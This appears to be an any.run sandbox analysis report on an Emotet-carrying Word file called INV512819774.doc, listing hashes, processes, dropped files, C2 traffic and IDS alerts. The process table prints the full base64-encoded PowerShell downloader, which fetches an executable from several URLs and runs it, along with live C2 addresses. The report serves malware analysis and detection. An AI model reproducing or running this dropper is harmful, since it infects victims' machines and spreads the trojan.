File name: | INV512819774.doc |
Full analysis: | https://app.any.run/tasks/61281762-7d39-4ac3-8d9c-83d1aea2fce4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 21, 2019, 14:49:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 20 14:48:00 2019, Last Saved Time/Date: Wed Mar 20 14:48:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 4AC1207211D6B884B1A322FA11AEB46E |
SHA1: | 2DE10304636F4833A91B0BC9590DC29051432AF4 |
SHA256: | 6351391DF902146D5B24DC85B79C1BF284BCC58029EA6D0507CD185469DB5B17 |
SSDEEP: | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qhl5Kd3NHvzkccoj:a77HUUUUUUUUUUUUUUUUUUUT52VGl5K3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:03:20 14:48:00 |
ModifyDate: | 2019:03:20 14:48:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3360 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INV512819774.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3588 | powershell -e JABSAEIAWABVAEEANAA9ACgAJwBQAFEAQgBBAEEAJwArACcARAAnACkAOwAkAHAAWgBEAEEAVQBrAHcAQQA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBjAEEAQQBBAHgAYwA9ACgAJwBoAHQAdABwADoAJwArACcALwAvAG4AbwByAHQAaAAnACsAJwBwAG8AJwArACcAbABsAHMALgBjAG8AbQAvAHcAbwByAGQAcAByAGUAcwBzACcAKwAnAF8AZQAnACsAJwAvAHgAaAAvAEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBwAGUAYQByAGwAeQB3ACcAKwAnAGgAaQB0AGUAcwAuAGMAbwAuAGkAbgAnACsAJwAvAGMAZwBpAC0AYgBpAG4ALwBUACcAKwAnAHcAUQAvAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6AC8ALwAnACsAJwBuAG8AJwArACcAdwBuACcAKwAnAG8AdwBzAGEAbABlAHMALgAnACsAJwBjAG8AbQAnACsAJwAvADUANgBtAHQAJwArACcANgBzADgAJwArACcALwBTAGkAUAAvAEAAaAB0AHQAcAA6AC8ALwBvACcAKwAnAHUAJwArACcAawBhAGkAbQBlAGQAZQBuAC4AbwByAGcALwBvAHQAdQBsADYAcABnAC8AZQAnACsAJwB5AGgAJwArACcARwAvACcAKwAnAEAAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA4ADUAMAAxAHMAYQBuAGwALgBjAG8AbQAvAHcAcAAtAGMAbwAnACsAJwBuAHQAZQBuAHQALwBBAEsAZwBEACcAKwAnAC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAHQARAAxAEEAbwBRAFoAQQA9ACgAJwBxAF8AJwArACcAYwBEAHcAJwArACcANAAnACkAOwAkAEcAQQBEAEIANABBAFEAbwAgAD0AIAAoACcAMgAnACsAJwA5ADgAJwApADsAJAB3AHcAYwB3AEMAdwBVAD0AKAAnAFUAJwArACcARwBBAGMAQgBVACcAKQA7ACQAYgBBAFUAXwBRAEEAQQBVAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAEEARABCADQAQQBRAG8AKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABBADQAWgBjAFoAVQAgAGkAbgAgACQAcgBjAEEAQQBBAHgAYwApAHsAdAByAHkAewAkAHAAWgBEAEEAVQBrAHcAQQAuACgAJwBEAG8AJwArACcAdwAnACsAJwBuAGwAbwAnACsAJwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAQQA0AFoAYwBaAFUALAAgACQAYgBBAFUAXwBRAEEAQQBVACkAOwAkAGQANABBAEEARABBAEIAeAA9ACgAJwBMAHcAQQBDAEEAXwAnACsAJwBjACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiAEEAVQBfAFEAQQBBAFUAKQAuACIATABFAG4AYABnAHQASAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQBtACcAKQAgACQAYgBBAFUAXwBRAEEAQQBVADsAJAB1AG8ARABCAEEAQQBBAD0AKAAnAHcAQgA0ACcAKwAnADEAUQAnACsAJwBRACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPADQAQgBEAEEAWABBAFEAPQAoACcAdgAnACsAJwBBAFEAQQB4ACcAKwAnAEQAQQBHACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3976 | "C:\Users\admin\298.exe" | C:\Users\admin\298.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2976 | --3cb22fef | C:\Users\admin\298.exe | 298.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2220 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 298.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2896 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2700 | "C:\Users\admin\AppData\Local\wabmetagen\D0qWu5L29LP13TTb.exe" | C:\Users\admin\AppData\Local\wabmetagen\D0qWu5L29LP13TTb.exe | — | wabmetagen.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1560 | --49dc6580 | C:\Users\admin\AppData\Local\wabmetagen\D0qWu5L29LP13TTb.exe | D0qWu5L29LP13TTb.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2728 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | D0qWu5L29LP13TTb.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3460 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR82F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3588 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2VJMNMZ9K4C3AEIL5BZ.temp | — | |
MD5:— | SHA256:— | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7F8C14D4349BA331FC9661517EA837AE | SHA256:CD046C672975B8EF57DAC4EB54959F41A484DD77C906F8409F4E02E9EEAB973C | |||
3588 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3588 | powershell.exe | C:\Users\admin\298.exe | executable | |
MD5:367A095AE17E31129C23E152FD750A73 | SHA256:1685CEFB3A1C71E78AD6B38B17FD4A15E7FD1C3ED6A246812125E5716C9EDFD8 | |||
2896 | wabmetagen.exe | C:\Users\admin\AppData\Local\wabmetagen\D0qWu5L29LP13TTb.exe | executable | |
MD5:DB309CB6A5084CFB416109AD0CDC4D1C | SHA256:07D9E95151047D6370D3E57B297E1B92C7E8F9E1B1903D9645794149A4A4DA32 | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6EF840CEA1EF6D36495D6EFBCB4C1886 | SHA256:9F56EBE2BE6AAE080BF91BF8A926461FAA84254558FF951B4AFAECA2786CE1E4 | |||
2976 | 298.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:367A095AE17E31129C23E152FD750A73 | SHA256:1685CEFB3A1C71E78AD6B38B17FD4A15E7FD1C3ED6A246812125E5716C9EDFD8 | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$V512819774.doc | pgc | |
MD5:6A093059C683330491AA5B4CEA3C280D | SHA256:DCF263D09614D681E267C92D7A95900E7C629F798DD8B84F1EE880F09771DB66 | |||
3588 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF101242.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3588 | powershell.exe | GET | — | 195.8.208.243:80 | http://northpolls.com/wordpress_e/xh/ | NL | — | — | suspicious |
3588 | powershell.exe | GET | 200 | 167.99.57.70:80 | http://pearlywhites.co.in/cgi-bin/TwQ/ | US | executable | 184 Kb | suspicious |
2896 | wabmetagen.exe | POST | 200 | 185.94.252.3:443 | http://185.94.252.3:443/ringin/glitch/ringin/ | DE | pgc | 117 Kb | malicious |
3460 | wabmetagen.exe | GET | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/whoami.php | US | text | 15 b | malicious |
3460 | wabmetagen.exe | POST | 200 | 185.94.252.3:443 | http://185.94.252.3:443/sym/free/ringin/merge/ | DE | binary | 794 Kb | malicious |
3460 | wabmetagen.exe | POST | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/odbc/ | US | binary | 6.00 Kb | malicious |
3460 | wabmetagen.exe | POST | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/add/ | US | binary | 6.02 Kb | malicious |
3460 | wabmetagen.exe | POST | 200 | 185.94.252.3:443 | http://185.94.252.3:443/taskbar/free/ | DE | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2896 | wabmetagen.exe | 185.94.252.3:443 | — | Andreas Fahl trading as Megaservers.de | DE | malicious |
3588 | powershell.exe | 167.99.57.70:80 | pearlywhites.co.in | — | US | suspicious |
3588 | powershell.exe | 195.8.208.243:80 | northpolls.com | Duocast B.V. | NL | suspicious |
3460 | wabmetagen.exe | 185.94.252.3:443 | — | Andreas Fahl trading as Megaservers.de | DE | malicious |
3460 | wabmetagen.exe | 74.208.5.2:25 | smtp.1and1.com | 1&1 Internet SE | US | malicious |
3460 | wabmetagen.exe | 198.58.114.91:4143 | — | Linode, LLC | US | malicious |
3460 | wabmetagen.exe | 173.203.187.10:465 | secure.emailsrvr.com | Rackspace Ltd. | US | malicious |
3460 | wabmetagen.exe | 68.6.19.8:587 | smtp.cox.net | Cox Communications Inc. | US | unknown |
3460 | wabmetagen.exe | 74.208.5.15:587 | smtp.mail.com | 1&1 Internet SE | US | malicious |
3460 | wabmetagen.exe | 96.114.157.81:465 | smtp.comcast.net | Comcast Cable Communications, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
northpolls.com |
| suspicious |
pearlywhites.co.in |
| suspicious |
mail.twc.com |
| shared |
smtp.mail.com |
| shared |
secure.emailsrvr.com |
| shared |
gator3258.hostgator.com |
| unknown |
smtp.1and1.com |
| shared |
smtp.cox.net |
| shared |
mail.inlandproductivity.com |
| unknown |
smtp.comcast.net |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3588 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3588 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3588 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3588 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2896 | wabmetagen.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 6 |
2896 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3460 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3460 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3460 | wabmetagen.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3460 | wabmetagen.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |